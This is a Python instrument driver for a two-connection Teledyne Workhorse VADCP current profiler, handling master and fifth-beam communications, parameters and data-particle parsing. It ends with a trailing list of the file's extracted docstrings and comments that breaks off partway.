from mi.instrument.teledyne.workhorse.driver import parameter_extractors
from mi.instrument.teledyne.workhorse.driver import parameter_formatters
from mi.instrument.teledyne.workhorse.driver import parameter_defaults
from mi.instrument.teledyne.workhorse.driver import parameter_types
from mi.instrument.teledyne.workhorse.driver import parameter_names
from mi.instrument.teledyne.workhorse.driver import parameter_descriptions
from mi.instrument.teledyne.workhorse.driver import parameter_ranges
from mi.instrument.teledyne.workhorse.driver import parameter_startup
from mi.instrument.teledyne.workhorse.driver import parameter_direct
from mi.instrument.teledyne.workhorse.driver import parameter_visibility
from mi.instrument.teledyne.workhorse.driver import parameter_units, WorkhorseProtocol
from mi.instrument.teledyne.workhorse.driver import WorkhorseProtocolState
from mi.instrument.teledyne.workhorse.driver import WorkhorseInstrumentCommands
from mi.instrument.teledyne.workhorse.driver import WorkhorseProtocolEvent
from mi.instrument.teledyne.workhorse.driver import ADCP_COMPASS_CALIBRATION_REGEX_MATCHER
from mi.instrument.teledyne.workhorse.driver import ADCP_PD0_PARSED_REGEX_MATCHER
from mi.instrument.teledyne.workhorse.driver import ADCP_SYSTEM_CONFIGURATION_REGEX_MATCHER
from mi.instrument.teledyne.workhorse.driver import ADCP_ANCILLARY_SYSTEM_DATA_REGEX_MATCHER
from mi.instrument.teledyne.workhorse.driver import ADCP_TRANSMIT_PATH_REGEX_MATCHER
from mi.instrument.teledyne.workhorse.driver import WorkhorseEngineeringParameter
from mi.instrument.teledyne.workhorse.driver import TIMEOUT
from mi.instrument.teledyne.workhorse.driver import WorkhorseScheduledJob
from mi.instrument.teledyne.workhorse.particles import VADCPDataParticleType, WorkhorseDataParticleType
log = get_logger()
master_parameter_defaults = copy.deepcopy(parameter_defaults)
slave_parameter_defaults = copy.deepcopy(parameter_defaults)
master_parameter_defaults[WorkhorseParameter.TRANSDUCER_DEPTH] = 2000
master_parameter_defaults[WorkhorseParameter.RDS3_MODE_SEL] = 1
master_parameter_defaults[WorkhorseParameter.SYNCH_DELAY] = 100
master_parameter_defaults[WorkhorseParameter.BLANK_AFTER_TRANSMIT] = 88
master_parameter_defaults[WorkhorseParameter.NUMBER_OF_DEPTH_CELLS] = 220
master_parameter_defaults[WorkhorseParameter.DEPTH_CELL_SIZE] = 100
master_parameter_defaults[WorkhorseParameter.TIME_PER_PING] = '00:01.00'
slave_parameter_defaults[WorkhorseParameter.TRANSDUCER_DEPTH] = 2000
slave_parameter_defaults[WorkhorseParameter.RDS3_MODE_SEL] = 2
slave_parameter_defaults[WorkhorseParameter.SYNCH_DELAY] = 0
slave_parameter_defaults[WorkhorseParameter.BLANK_AFTER_TRANSMIT] = 83
slave_parameter_defaults[WorkhorseParameter.NUMBER_OF_DEPTH_CELLS] = 220
slave_parameter_defaults[WorkhorseParameter.DEPTH_CELL_SIZE] = 94
slave_parameter_defaults[WorkhorseParameter.TIME_PER_PING] = '00:00.00'
class SlaveProtocol(BaseEnum):
"""
The protocol needs to have 2 connections, 4Beam(Master) and 5thBeam(Slave)
"""
FOURBEAM = '4Beam'
FIFTHBEAM = '5thBeam'
class InstrumentDriver(SingleConnectionInstrumentDriver):
def __init__(self, evt_callback, refdes=None):
"""
InstrumentDriver constructor.
@param evt_callback Driver process event callback.
"""
SingleConnectionInstrumentDriver.__init__(self, evt_callback, refdes)
# multiple portAgentClient
self._connection = {}
def _build_protocol(self):
"""
Construct the driver protocol state machine.
"""
self._protocol = Protocol(WorkhorsePrompt, NEWLINE, self._driver_event,
connections=[SlaveProtocol.FOURBEAM, SlaveProtocol.FIFTHBEAM])
def _handler_inst_disconnected_connect(self, *args, **kwargs):
self._build_protocol()
self.set_init_params({})
self._protocol.connections[SlaveProtocol.FOURBEAM] = self._connection[SlaveProtocol.FOURBEAM]
self._protocol.connections[SlaveProtocol.FIFTHBEAM] = self._connection[SlaveProtocol.FIFTHBEAM]
return DriverConnectionState.CONNECTED, None
def _handler_disconnected_connect(self, *args, **kwargs):
"""
Establish communications with the device via port agent / logger and
construct and initialize a protocol FSM for device interaction.
@return (next_state, result) tuple, (DriverConnectionState.CONNECTED, None) if successful.
"""
next_state = DriverConnectionState.INST_DISCONNECTED
result = None
# for Master first
try:
self._connection[SlaveProtocol.FOURBEAM].init_comms()
self._connection[SlaveProtocol.FIFTHBEAM].init_comms()
except InstrumentConnectionException as e:
log.error("Connection Exception: %s", e)
log.error("Instrument Driver returning to unconfigured state.")
next_state = DriverConnectionState.UNCONFIGURED
init_config = {}
if len(args) > 0 and isinstance(args[0], dict):
init_config = args[0]
self.set_init_params(init_config)
return next_state, (next_state, result)
def _handler_connected_disconnect(self, *args, **kwargs):
"""
Disconnect to the device via port agent / logger and destroy the protocol FSM.
@return (next_state, result) tuple, (DriverConnectionState.UNCONFIGURED, None) if successful.
"""
next_state = DriverConnectionState.UNCONFIGURED
result = None
for connection in self._connection.values():
connection.stop_comms()
self._destroy_protocol()
return next_state, (next_state, result)
def _handler_connected_connection_lost(self, *args, **kwargs):
"""
The device connection was lost. Stop comms, destroy protocol FSM and revert to unconfigured state.
@return (next_state, result) tuple, (DriverConnectionState.UNCONFIGURED, None).
"""
for connection in self._connection.values():
connection.stop_comms()
self._destroy_protocol()
return DriverConnectionState.UNCONFIGURED, None
def _build_connection(self, *args, **kwargs):
"""
Constructs and returns a Connection object according to the given
configuration. The connection object is a LoggerClient instance in
this base class. Subclasses can overwrite this operation as needed.
The value returned by this operation is assigned to self._connection
and also to self._protocol._connection upon entering in the
DriverConnectionState.CONNECTED state.
@param all_configs configuration dict
@returns a dictionary of Connection instances, which will be assigned to self._connection
@throws InstrumentParameterException Invalid configuration.
"""
all_configs = kwargs.get('config', None) # via kwargs
if all_configs is None and len(args) > 0:
all_configs = args[0] # via first argument
if all_configs is None:
all_configs = {SlaveProtocol.FOURBEAM: self._get_port_agent_config(self.refdes + '-4'),
SlaveProtocol.FIFTHBEAM: self._get_port_agent_config(self.refdes + '-5')}
for key in all_configs:
if all_configs[key] is None:
raise InstrumentParameterException('No %s port agent config supplied and failed to auto-discover' % key)
connections = {}
for name, config in all_configs.items():
if not isinstance(config, dict):
continue
if 'mock_port_agent' in config:
mock_port_agent = config['mock_port_agent']
# check for validity here...
if mock_port_agent is not None:
connections[name] = mock_port_agent
else:
try:
addr = config['addr']
port = config['port']
cmd_port = config.get('cmd_port')
if isinstance(addr, basestring) and isinstance(port, int) and len(addr) > 0:
callback = functools.partial(self._got_data, connection=name)
connections[name] = PortAgentClient(addr, port, cmd_port, callback,
self._lost_connection_callback)
else:
raise InstrumentParameterException('Invalid comms config dict in build_connections.')
except (TypeError, KeyError) as e:
raise InstrumentParameterException('Invalid comms config dict.. %r' % e)
return connections
def get_direct_config(self):
"""
Note - must override if instrument driver has more than one instrument configuration.
:return: list of dictionaries containing direct access configuration and commands
"""
config = []
if self._protocol:
for idx, connection in enumerate([SlaveProtocol.FOURBEAM, SlaveProtocol.FIFTHBEAM]):
config.append({})
config[idx] = self._protocol.get_direct_config()
if connection is SlaveProtocol.FOURBEAM:
config[idx]['title'] = 'Beams 1-4'
if connection is SlaveProtocol.FIFTHBEAM:
config[idx]['title'] = '5th Beam'
config[idx]['ip'] = self._port_agent_config.get(connection, {}).get('host', 'uft20')
config[idx]['data'] = self._port_agent_config.get(connection, {}).get('ports', {}).get('da')
config[idx]['sniffer'] = \
self._port_agent_config.get(connection, {}).get('ports', {}).get('sniff')
return config
def _got_data(self, port_agent_packet, connection=None):
if isinstance(port_agent_packet, Exception):
return self._got_exception(port_agent_packet)
if isinstance(port_agent_packet, PortAgentPacket):
packet_type = port_agent_packet.get_header_type()
data = port_agent_packet.get_data()
if packet_type == PortAgentPacket.PORT_AGENT_CONFIG:
try:
paconfig = json.loads(data)
self._port_agent_config[connection] = paconfig
self._driver_event(DriverAsyncEvent.DRIVER_CONFIG, paconfig)
except ValueError as e:
log.exception('Unable to parse port agent config: %r %r', data, e)
elif packet_type == PortAgentPacket.PORT_AGENT_STATUS:
current_state = self._connection_fsm.get_current_state()
if data == 'DISCONNECTED':
self._async_raise_event(DriverEvent.PA_CONNECTION_LOST)
elif data == 'CONNECTED':
if current_state == DriverConnectionState.INST_DISCONNECTED:
self._async_raise_event(DriverEvent.CONNECT)
else:
if connection and self._protocol:
self._protocol.got_data(port_agent_packet, connection=connection)
class Protocol(WorkhorseProtocol):
def __init__(self, prompts, newline, driver_event, connections=None):
"""
Constructor.
@param prompts Enum class containing possible device prompts used for
command response logic.
@param newline The device newline.
@driver_event The callback for asynchronous driver events.
"""
if not type(connections) is list:
raise InstrumentProtocolException('Unable to instantiate multi connection protocol without connection list')
self._param_dict2 = ProtocolParameterDict()
# Construct superclass.
WorkhorseProtocol.__init__(self, prompts, newline, driver_event)
# Create multiple connection versions of the pieces of protocol involving data to/from the instrument
self._linebuf = {connection: '' for connection in connections}
self._promptbuf = {connection: '' for connection in connections}
self._last_data_timestamp = {connection: None for connection in connections}
self.connections = {connection: None for connection in connections}
self.chunkers = {connection: StringChunker(self.sieve_function) for connection in connections}
def _get_response(self, timeout=10, expected_prompt=None, response_regex=None, connection=None):
"""
Overridden to handle multiple port agent connections
"""
if connection is None:
raise InstrumentProtocolException('_get_response: no connection supplied!')
# Grab time for timeout and wait for prompt.
end_time = time.time() + timeout
if response_regex and not isinstance(response_regex, RE_PATTERN):
raise InstrumentProtocolException('Response regex is not a compiled pattern!')
if expected_prompt and response_regex:
raise InstrumentProtocolException('Cannot supply both regex and expected prompt!')
if expected_prompt is None:
prompt_list = self._get_prompts()
else:
if isinstance(expected_prompt, basestring):
prompt_list = [expected_prompt]
else:
prompt_list = expected_prompt
if response_regex is None:
pattern = None
else:
pattern = response_regex.pattern
log.debug('_get_response: timeout=%s, prompt_list=%s, expected_prompt=%r, response_regex=%r, promptbuf=%r',
timeout, prompt_list, expected_prompt, pattern, self._promptbuf)
while time.time() < end_time:
if response_regex:
# noinspection PyArgumentList
match = response_regex.search(self._linebuf[connection])
if match:
return match.groups()
else:
for item in prompt_list:
index = self._promptbuf[connection].find(item)
if index >= 0:
result = self._promptbuf[connection][0:index + len(item)]
return item, result
time.sleep(.1)
raise InstrumentTimeoutException("in InstrumentProtocol._get_response()")
def _do_cmd_resp(self, cmd, *args, **kwargs):
"""
Overridden to handle multiple port agent connections
"""
connection = kwargs.get('connection')
if connection is None:
raise InstrumentProtocolException('_do_cmd_resp: no connection supplied!')
# Get timeout and initialize response.
timeout = kwargs.get('timeout', DEFAULT_CMD_TIMEOUT)
expected_prompt = kwargs.get('expected_prompt', None)
response_regex = kwargs.get('response_regex', None)
if response_regex and not isinstance(response_regex, RE_PATTERN):
raise InstrumentProtocolException('Response regex is not a compiled pattern!')
if expected_prompt and response_regex:
raise InstrumentProtocolException('Cannot supply both regex and expected prompt!')
self._do_cmd_no_resp(cmd, *args, **kwargs)
# Wait for the prompt, prepare result and return, timeout exception
if response_regex:
prompt = ""
result_tuple = self._get_response(timeout,
connection=connection,
response_regex=response_regex,
expected_prompt=expected_prompt)
result = "".join(result_tuple)
else:
(prompt, result) = self._get_response(timeout,
connection=connection,
expected_prompt=expected_prompt)
resp_handler = self._response_handlers.get((self.get_current_state(), cmd),
self._response_handlers.get(cmd, None))
resp_result = None
if callable(resp_handler):
resp_result = resp_handler(result, prompt)
return resp_result
def _send_data(self, data, write_delay=0, connection=None):
if connection is None:
raise InstrumentProtocolException('_send_data: no connection supplied!')
if write_delay == 0:
self.connections[connection].send(data)
else:
for char in data:
self.connections[connection].send(char)
time.sleep(write_delay)
def _do_cmd_no_resp(self, cmd, *args, **kwargs):
"""
Overridden to handle multiple port agent connections
"""
connection = kwargs.get('connection')
if connection is None:
raise InstrumentProtocolException('_do_cmd_no_resp: no connection supplied! %r %r %r' % (cmd, args, kwargs))
timeout = kwargs.get('timeout', DEFAULT_CMD_TIMEOUT)
write_delay = kwargs.get('write_delay', DEFAULT_WRITE_DELAY)
build_handler = self._build_handlers.get(cmd, None)
if not callable(build_handler):
log.error('_do_cmd_no_resp: no handler for command: %s' % cmd)
raise InstrumentProtocolException(error_code=InstErrorCode.BAD_DRIVER_COMMAND)
cmd_line = build_handler(cmd, *args)
# Wakeup the device, timeout exception as needed
self._wakeup(timeout, connection=connection)
# Clear line and prompt buffers for result, then send command.
self._linebuf[connection] = ''
self._promptbuf[connection] = ''
self._send_data(cmd_line, write_delay, connection=connection)
def _do_cmd_direct(self, cmd, connection=None):
"""
Issue an untranslated command to the instrument. No response is handled
as a result of the command.
@param cmd The high level command to issue
"""
# Send command.
self._send_data(cmd, connection=connection)
########################################################################
# Incoming data (for parsing) callback.
########################################################################
def got_data(self, port_agent_packet, connection=None):
"""
Called by the instrument connection when data is available.
Append line and prompt buffers.
Also add data to the chunker and when received call got_chunk
to publish results.
:param connection: connection which produced this packet
:param port_agent_packet: packet of data
"""
if connection is None:
raise InstrumentProtocolException('got_data: no connection supplied!')
data_length = port_agent_packet.get_data_length()
data = port_agent_packet.get_data()
timestamp = port_agent_packet.get_timestamp()
log.debug("Got Data: %r %r", connection, data)
log.debug("Add Port Agent Timestamp: %r %s", connection, timestamp)
if data_length > 0:
if self.get_current_state() == DriverProtocolState.DIRECT_ACCESS:
self._driver_event(DriverAsyncEvent.DIRECT_ACCESS, data)
self.add_to_buffer(data, connection=connection)
self.chunkers[connection].add_chunk(data, timestamp)
(timestamp, chunk) = self.chunkers[connection].get_next_data()
while chunk:
self._got_chunk(chunk, timestamp, connection=connection)
(timestamp, chunk) = self.chunkers[connection].get_next_data()
########################################################################
# Incoming raw data callback.
########################################################################
def got_raw(self, port_agent_packet, connection=None):
"""
Called by the port agent client when raw data is available, such as data
sent by the driver to the instrument, the instrument responses,etc.
:param connection: connection which produced this packet
:param port_agent_packet: packet of data
"""
self.publish_raw(port_agent_packet, connection)
def publish_raw(self, port_agent_packet, connection=None):
pass
def add_to_buffer(self, data, connection=None):
"""
Add a chunk of data to the internal data buffers
buffers implemented as lifo ring buffer
:param data: bytes to add to the buffer
:param connection: connection which produced this packet
"""
# Update the line and prompt buffers.
self._linebuf[connection] += data
self._promptbuf[connection] += data
self._last_data_timestamp[connection] = time.time()
# If our buffer exceeds the max allowable size then drop the leading
# characters on the floor.
if len(self._linebuf[connection]) > self._max_buffer_size():
self._linebuf[connection] = self._linebuf[connection][self._max_buffer_size() * -1:]
# If our buffer exceeds the max allowable size then drop the leading
# characters on the floor.
if len(self._promptbuf[connection]) > self._max_buffer_size():
self._promptbuf[connection] = self._promptbuf[connection][self._max_buffer_size() * -1:]
log.debug("LINE BUF: %r", self._linebuf[connection][-50:])
log.debug("PROMPT BUF: %r", self._promptbuf[connection][-50:])
########################################################################
# Wakeup helpers.
########################################################################
def _send_wakeup(self, connection=None):
"""
Send a wakeup to the device. Overridden by device specific
subclasses.
"""
self.connections[connection].send(NEWLINE)
def _wakeup(self, timeout, delay=1, connection=None):
"""
Clear buffers and send a wakeup command to the instrument
@param timeout The timeout to wake the device.
@param delay The time to wait between consecutive wakeups.
@throw InstrumentTimeoutException if the device could not be woken.
"""
if connection is None:
raise InstrumentProtocolException('_wakeup: no connection supplied!')
# Clear the prompt buffer.
log.trace("clearing promptbuf: %r", self._promptbuf)
self._promptbuf[connection] = ''
# Grab time for timeout.
starttime = time.time()
while True:
# Send a line return and wait a sec.
log.trace('Sending wakeup. timeout=%s', timeout)
self._send_wakeup(connection=connection)
time.sleep(delay)
log.trace("Prompts: %s", self._get_prompts())
for item in self._get_prompts():
log.trace("buffer: %r", self._promptbuf[connection])
log.trace("find prompt: %r", item)
index = self._promptbuf[connection].find(item)
log.trace("Got prompt (index: %s): %r ", index, self._promptbuf[connection])
if index >= 0:
log.trace('wakeup got prompt: %r', item)
return item
log.trace("Searched for all prompts")
if time.time() > starttime + timeout:
raise InstrumentTimeoutException("in _wakeup()")
def _build_param_dict(self):
# We're going to build two complete sets of ADCP parameters here
# one set for the master instrument and one for the slave
for param in parameter_regexes:
self._param_dict.add(param,
parameter_regexes.get(param),
parameter_extractors.get(param),
parameter_formatters.get(param),
type=parameter_types.get(param),
display_name=parameter_names.get(param),
description=parameter_descriptions.get(param),
range=parameter_ranges.get(param),
startup_param=parameter_startup.get(param, False),
direct_access=parameter_direct.get(param, False),
visibility=parameter_visibility.get(param, ParameterDictVisibility.READ_WRITE),
default_value=master_parameter_defaults.get(param),
units=parameter_units.get(param))
for param in parameter_regexes:
# Scheduled events are handled by the master
if WorkhorseEngineeringParameter.has(param):
continue
self._param_dict.add(param + '_5th',
r'DONTMATCHMEIMNOTREAL!',
parameter_extractors.get(param),
parameter_formatters.get(param),
type=parameter_types.get(param),
display_name=parameter_names.get(param) + ' (5th beam)',
description=parameter_descriptions.get(param),
range=parameter_ranges.get(param),
startup_param=parameter_startup.get(param, False),
direct_access=parameter_direct.get(param, False),
visibility=parameter_visibility.get(param, ParameterDictVisibility.READ_WRITE),
default_value=slave_parameter_defaults.get(param),
units=parameter_units.get(param))
self._param_dict.set_default(WorkhorseParameter.CLOCK_SYNCH_INTERVAL)
self._param_dict.set_default(WorkhorseParameter.GET_STATUS_INTERVAL)
# now we're going to build a whole 'nother param dict for the slave parameters
# that contain regex values so we can fill them in easily...
for param in parameter_regexes:
# Scheduled events are handled by the master
if WorkhorseEngineeringParameter.has(param):
continue
self._param_dict2.add(param + '_5th',
parameter_regexes.get(param),
parameter_extractors.get(param),
parameter_formatters.get(param))
# #######################################################################
# Private helpers.
# #######################################################################
def _got_chunk(self, chunk, timestamp, connection=None):
"""
The base class got_data has gotten a chunk from the chunker.
Pass it to extract_sample with the appropriate particle
objects and REGEXes.
"""
if ADCP_PD0_PARSED_REGEX_MATCHER.match(chunk):
pd0 = AdcpPd0Record(chunk)
transform = pd0.coord_transform.coord_transform
# Only BEAM transform supported for VADCP
if transform != particles.Pd0CoordinateTransformType.BEAM:
raise SampleException('Received unsupported coordinate transform type: %s' % transform)
if connection == SlaveProtocol.FOURBEAM:
science = particles.VadcpBeamMasterParticle(pd0, port_timestamp=timestamp).generate()
config = particles.AdcpPd0ConfigParticle(pd0, port_timestamp=timestamp).generate()
engineering = particles.AdcpPd0EngineeringParticle(pd0, port_timestamp=timestamp).generate()
else:
science = particles.VadcpBeamSlaveParticle(pd0, port_timestamp=timestamp).generate()
config = particles.VadcpConfigSlaveParticle(pd0, port_timestamp=timestamp).generate()
engineering = particles.VadcpEngineeringSlaveParticle(pd0, port_timestamp=timestamp).generate()
out_particles = [science]
for particle in [config, engineering]:
if self._changed(particle):
out_particles.append(particle)
for particle in out_particles:
self._driver_event(DriverAsyncEvent.SAMPLE, particle)
else:
if connection == SlaveProtocol.FIFTHBEAM:
if self._extract_sample(particles.VadcpCompassCalibrationDataParticle,
ADCP_COMPASS_CALIBRATION_REGEX_MATCHER,
chunk,
timestamp):
return
if self._extract_sample(particles.VadcpSystemConfigurationDataParticle,
ADCP_SYSTEM_CONFIGURATION_REGEX_MATCHER,
chunk,
timestamp):
return
if self._extract_sample(particles.VadcpAncillarySystemDataParticle,
ADCP_ANCILLARY_SYSTEM_DATA_REGEX_MATCHER,
chunk,
timestamp):
return
if self._extract_sample(particles.VadcpTransmitPathParticle,
ADCP_TRANSMIT_PATH_REGEX_MATCHER,
chunk,
timestamp):
return
elif connection == SlaveProtocol.FOURBEAM:
if self._extract_sample(particles.AdcpCompassCalibrationDataParticle,
ADCP_COMPASS_CALIBRATION_REGEX_MATCHER,
chunk,
timestamp):
return
if self._extract_sample(particles.AdcpSystemConfigurationDataParticle,
ADCP_SYSTEM_CONFIGURATION_REGEX_MATCHER,
chunk,
timestamp):
return
if self._extract_sample(particles.AdcpAncillarySystemDataParticle,
ADCP_ANCILLARY_SYSTEM_DATA_REGEX_MATCHER,
chunk,
timestamp):
return
if self._extract_sample(particles.AdcpTransmitPathParticle,
ADCP_TRANSMIT_PATH_REGEX_MATCHER,
chunk,
timestamp):
return
def _send_break_cmd(self, delay, connection=None):
"""
Send a BREAK to attempt to wake the device.
"""
self.connections[connection].send_break(delay)
def _sync_clock(self, command, date_time_param, timeout=TIMEOUT, delay=1, time_format="%Y/%m/%d,%H:%M:%S"):
"""
Send the command to the instrument to synchronize the clock
@param command set command
@param date_time_param: date time parameter that we want to set
@param timeout: command timeout
@param delay: wakeup delay
@param time_format: time format string for set command
"""
log.info("SYNCING TIME WITH SENSOR.")
for connection in self.connections:
self._do_cmd_resp(command, date_time_param, get_timestamp_delayed("%Y/%m/%d, %H:%M:%S"),
timeout=timeout, connection=connection)
# #######################################################################
# Startup parameter handlers
########################################################################
def _get_params(self, parameters, connection):
command = NEWLINE.join(['%s?' % p for p in parameters]) + NEWLINE
if len(parameters) > 1:
regex = re.compile(r'(%s.*?%s.*?>)' % (parameters[0], parameters[-1]), re.DOTALL)
else:
regex = re.compile(r'(%s.*?>)' % parameters[0], re.DOTALL)
self._linebuf[connection] = ''
self._promptbuf[connection] = ''
self._do_cmd_direct(command, connection=connection)
return self._get_response(response_regex=regex, connection=connection)
def _update_params(self, *args, **kwargs):
"""
Update the parameter dictionary.
"""
# see if we passed in a list of parameters to query
# if not, use the whole parameter list
parameters = kwargs.get('params')
if parameters is None or WorkhorseParameter.ALL in parameters:
parameters = self._param_dict.get_keys()
# filter out the engineering parameters and ALL
parameters = [p for p in parameters if not WorkhorseEngineeringParameter.has(p) and p != WorkhorseParameter.ALL]
# Get old param dict config.
old_config = self._param_dict.get_config()
if parameters:
# MASTER
master_params = [p for p in parameters if '_5th' not in p]
if master_params:
resp = self._get_params(master_params, SlaveProtocol.FOURBEAM)
self._param_dict.update_many(resp)
# SLAVE
slave_params = [p.replace('_5th', '') for p in parameters if '_5th' in p]
if slave_params:
resp = self._get_params(slave_params, SlaveProtocol.FIFTHBEAM)
self._param_dict2.update_many(resp)
for key, value in self._param_dict2.get_all().iteritems():
self._param_dict.set_value(key, value)
new_config = self._param_dict.get_config()
# Check if there is any changes. Ignore TT
if not dict_equal(new_config, old_config, ['TT']) or kwargs.get('force'):
self._driver_event(DriverAsyncEvent.CONFIG_CHANGE)
def _execute_set_params(self, commands, connection):
if commands:
# we are going to send the concatenation of all our set commands
self._linebuf[connection] = ''
self._do_cmd_direct(''.join(commands), connection=connection)
# we'll need to build a regular expression to retrieve all of the responses
# including any possible errors
if len(commands) == 1:
regex = re.compile(r'(%s.*?)\r\n>' % commands[-1].strip(), re.DOTALL)
else:
regex = re.compile(r'(%s.*?%s.*?)\r\n>' % (commands[0].strip(), commands[-1].strip()), re.DOTALL)
response = self._get_response(response_regex=regex, connection=connection)
self._parse_set_response(response[0], None)
def _set_params(self, *args, **kwargs):
"""
Issue commands to the instrument to set various parameters
"""
self._verify_not_readonly(*args, **kwargs)
params = args[0]
changed = []
old_config = self._param_dict.get_config()
master_commands = []
slave_commands = []
for key, val in params.iteritems():
if WorkhorseEngineeringParameter.has(key):
continue
if val != old_config.get(key):
changed.append(key)
if '_5th' in key:
slave_commands.append(self._build_set_command(
WorkhorseInstrumentCommands.SET, key.replace('_5th', ''), val))
else:
master_commands.append(self._build_set_command(WorkhorseInstrumentCommands.SET, key, val))
self._execute_set_params(master_commands, connection=SlaveProtocol.FOURBEAM)
self._execute_set_params(slave_commands, connection=SlaveProtocol.FIFTHBEAM)
# Handle engineering parameters
force = False
if WorkhorseParameter.CLOCK_SYNCH_INTERVAL in params:
if (params[WorkhorseParameter.CLOCK_SYNCH_INTERVAL] != self._param_dict.get(
WorkhorseParameter.CLOCK_SYNCH_INTERVAL)):
self._param_dict.set_value(WorkhorseParameter.CLOCK_SYNCH_INTERVAL,
params[WorkhorseParameter.CLOCK_SYNCH_INTERVAL])
self.start_scheduled_job(WorkhorseParameter.CLOCK_SYNCH_INTERVAL, WorkhorseScheduledJob.CLOCK_SYNC,
WorkhorseProtocolEvent.SCHEDULED_CLOCK_SYNC)
force = True
if WorkhorseParameter.GET_STATUS_INTERVAL in params:
if (params[WorkhorseParameter.GET_STATUS_INTERVAL] != self._param_dict.get(
WorkhorseParameter.GET_STATUS_INTERVAL)):
self._param_dict.set_value(WorkhorseParameter.GET_STATUS_INTERVAL,
params[WorkhorseParameter.GET_STATUS_INTERVAL])
self.start_scheduled_job(WorkhorseParameter.GET_STATUS_INTERVAL,
WorkhorseScheduledJob.GET_CONFIGURATION,
WorkhorseProtocolEvent.SCHEDULED_GET_STATUS)
force = True
self._update_params(params=changed, force=force)
return None
def _send_break(self, duration=1000, connection=None):
"""
Send a BREAK to attempt to wake the device.
"""
self._linebuf[connection] = ''
self._promptbuf[connection] = ''
self._send_break_cmd(duration, connection=connection)
self._get_response(expected_prompt=WorkhorsePrompt.BREAK, connection=connection)
def _start_logging(self, timeout=TIMEOUT, connection=None):
"""
Command the instrument to start logging
@param timeout: how long to wait for a prompt
@throws: InstrumentProtocolException if failed to start logging
"""
try:
start = WorkhorseInstrumentCommands.START_LOGGING
# start the slave first, it collects on signal from master
self._do_cmd_resp(start, timeout=timeout, connection=SlaveProtocol.FIFTHBEAM)
self._do_cmd_resp(start, timeout=timeout, connection=SlaveProtocol.FOURBEAM)
except InstrumentException:
self._stop_logging()
raise
def _stop_logging(self):
# stop the master first (slave only collects on signal from master)
self._send_break(connection=SlaveProtocol.FOURBEAM)
self._send_break(connection=SlaveProtocol.FIFTHBEAM)
def _discover(self, connection=None):
"""
Discover current state; can be COMMAND or AUTOSAMPLE or UNKNOWN.
@throws InstrumentTimeoutException if the device cannot be woken.
@throws InstrumentStateException if the device response does not correspond to
an expected state.
"""
states = set()
command = WorkhorseProtocolState.COMMAND
auto = WorkhorseProtocolState.AUTOSAMPLE
protocol_state = command
for connection in self.connections:
try:
self._wakeup(3, connection=connection)
states.add(command)
except InstrumentException:
states.add(auto)
if len(states) == 1:
# states match, return this state
protocol_state = states.pop()
# states don't match
self._stop_logging()
return protocol_state
def _run_test(self, *args, **kwargs):
kwargs['timeout'] = 30
kwargs['expected_prompt'] = WorkhorsePrompt.COMMAND
result = []
for connection in self.connections:
result.append(connection)
kwargs['connection'] = connection
result.append(self._do_cmd_resp(WorkhorseInstrumentCommands.RUN_TEST_200, *args, **kwargs))
return NEWLINE.join(result)
@contextmanager
def _pause_logging(self):
try:
self._stop_logging()
yield
finally:
self._start_logging()
########################################################################
# COMMAND handlers.
########################################################################
def _handler_command_acquire_status(self, *args, **kwargs):
"""
execute a get status
@return next_state, (next_state, result) if successful.
@throws InstrumentProtocolException from _do_cmd_resp.
"""
next_state = None
super(Protocol, self)._do_acquire_status(connection=SlaveProtocol.FOURBEAM)
super(Protocol, self)._do_acquire_status(connection=SlaveProtocol.FIFTHBEAM)
result = self.wait_for_particles([VADCPDataParticleType.VADCP_SYSTEM_CONFIGURATION_SLAVE,
VADCPDataParticleType.VADCP_COMPASS_CALIBRATION_SLAVE,
VADCPDataParticleType.VADCP_ANCILLARY_SYSTEM_DATA_SLAVE,
VADCPDataParticleType.VADCP_TRANSMIT_PATH_SLAVE,
WorkhorseDataParticleType.ADCP_SYSTEM_CONFIGURATION,
WorkhorseDataParticleType.ADCP_COMPASS_CALIBRATION,
WorkhorseDataParticleType.ADCP_ANCILLARY_SYSTEM_DATA,
WorkhorseDataParticleType.ADCP_TRANSMIT_PATH])
return next_state, (next_state, result)
def _handler_command_recover_autosample(self):
log.info('PD0 sample detected in COMMAND, not allowed in VADCP. Sending break')
self._stop_logging()
######################################################
# DIRECT_ACCESS handlers
######################################################
def _handler_direct_access_execute_direct(self, data):
next_state = None
result = []
self._do_cmd_direct(data)
# add sent command to list for 'echo' filtering in callback
self._sent_cmds.append(data)
return next_state, (next_state, result)
|
en
| 0.642129
|
The protocol needs to have 2 connections, 4Beam(Master) and 5thBeam(Slave) InstrumentDriver constructor. @param evt_callback Driver process event callback. # multiple portAgentClient Construct the driver protocol state machine. Establish communications with the device via port agent / logger and construct and initialize a protocol FSM for device interaction. @return (next_state, result) tuple, (DriverConnectionState.CONNECTED, None) if successful. # for Master first Disconnect to the device via port agent / logger and destroy the protocol FSM. @return (next_state, result) tuple, (DriverConnectionState.UNCONFIGURED, None) if successful. The device connection was lost. Stop comms, destroy protocol FSM and revert to unconfigured state. @return (next_state, result) tuple, (DriverConnectionState.UNCONFIGURED, None). Constructs and returns a Connection object according to the given configuration. The connection object is a LoggerClient instance in this base class. Subclasses can overwrite this operation as needed. The value returned by this operation is assigned to self._connection and also to self._protocol._connection upon entering in the DriverConnectionState.CONNECTED state. @param all_configs configuration dict @returns a dictionary of Connection instances, which will be assigned to self._connection @throws InstrumentParameterException Invalid configuration. # via kwargs # via first argument # check for validity here... Note - must override if instrument driver has more than one instrument configuration. :return: list of dictionaries containing direct access configuration and commands Constructor. @param prompts Enum class containing possible device prompts used for command response logic. @param newline The device newline. @driver_event The callback for asynchronous driver events. # Construct superclass. # Create multiple connection versions of the pieces of protocol involving data to/from the instrument Overridden to handle multiple port agent connections # Grab time for timeout and wait for prompt. # noinspection PyArgumentList Overridden to handle multiple port agent connections # Get timeout and initialize response. # Wait for the prompt, prepare result and return, timeout exception Overridden to handle multiple port agent connections # Wakeup the device, timeout exception as needed # Clear line and prompt buffers for result, then send command. Issue an untranslated command to the instrument. No response is handled as a result of the command. @param cmd The high level command to issue # Send command. ######################################################################## # Incoming data (for parsing) callback. ######################################################################## Called by the instrument connection when data is available. Append line and prompt buffers. Also add data to the chunker and when received call got_chunk to publish results. :param connection: connection which produced this packet :param port_agent_packet: packet of data ######################################################################## # Incoming raw data callback. ######################################################################## Called by the port agent client when raw data is available, such as data sent by the driver to the instrument, the instrument responses,etc. :param connection: connection which produced this packet :param port_agent_packet: packet of data Add a chunk of data to the internal data buffers buffers implemented as lifo ring buffer :param data: bytes to add to the buffer :param connection: connection which produced this packet # Update the line and prompt buffers. # If our buffer exceeds the max allowable size then drop the leading # characters on the floor. # If our buffer 